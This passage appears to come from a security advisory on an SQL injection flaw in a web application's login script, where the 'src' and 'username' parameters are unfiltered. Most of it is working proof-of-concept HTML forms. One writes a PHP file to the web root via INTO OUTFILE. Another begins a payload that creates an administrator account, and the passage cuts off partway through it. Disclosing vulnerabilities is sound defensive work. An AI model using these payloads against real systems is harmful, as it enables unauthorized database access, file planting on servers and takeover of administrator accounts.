The vulnerability exists due to insufficient filtration of "src" and "username" HTTP GET parameters passed to "/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. Depending on database and system configuration, the PoC (Proof-of-Concept) code below will create a "/var/www/file.php" file with PHP function 'phpinfo()': <form action="http://[host]/index.php" method="post" name="main"><input type="hidden" name="action" value="login"><input type="hidden" name="int" value="1"><input type="hidden" name="module" value="login"><input type="hidden" name="password" value="password"><input type="hidden" name="src" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- "><input type="hidden" name="username" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- "><input type="submit" id="btn"></form> The second PoC will attempt to creaate a new administrative user with username "hacker" and password "hacker": <form action="http://[host]/index.php" method="post" name="main"><input type="hidden" name="action" value="login"><input type="hidden" name="int" value="1"><input type="hidden" name="module" value="login"><input type="hidden" name="password" value="password"><input type="hidden" name="src" value="' UNION SELECT 'INSERT INTO users (username, password, is_admin) VALUES ("hacker""